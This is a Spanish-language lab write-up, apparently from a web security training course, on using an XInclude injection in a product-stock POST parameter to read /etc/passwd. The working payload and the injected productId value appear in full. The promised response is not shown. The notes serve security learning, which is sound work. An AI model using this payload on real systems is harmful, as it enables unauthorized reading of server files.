🫀Laboratorio: Exploiting XInclude to retrieve files

Dice el lab que para poder obtener el etc/passwd por si solo inyectandolo como lo vimos con XInclude no sirve por si solo, debe añadirse un atributo adicional al XInclude para ver si funciona, bajo lo que busque con perplexity tengo esto: parse="text"

<xi:include parse="text" href="file:///etc/passwd"/>
----------------------------------------------------
LO DEMÁS DEL ATAQUE: 
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
----------------------------------------------------

Aquí se ha añadido el atributo parse="text" a la directiva xi:include, lo que indica que el contenido del archivo /etc/passwd debe ser tratado como texto en lugar de intentar analizarlo como XML.
Ahora haremos lo de siempre, tomar la request POST de check stock:

En este caso está vez la peticion POST no tiene directamente un XML sin embargo la entrada el usuario por debajo del lado del servidor se interpreta como un XML y ese es el punto crucial para este ataque, ahora bien como reconozco directamente cual es la entrada del usuario si en la POST Request me aparecen esos dos parametros, bueno muy simple:

La url tiene el productId=”Entrada del usuario si sabe”

productId=1&storeId=2 así que vamos a modificarla para poder añadir ahí nuestra XInclude

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=2

Y esto devuelve:

Resuelto el lab:

PreviousLaboratorio: Exploiting XXE to retrieve data by repurposing a local DTD NextLaboratorio: Exploiting XXE via image file upload

Last updated 10 months ago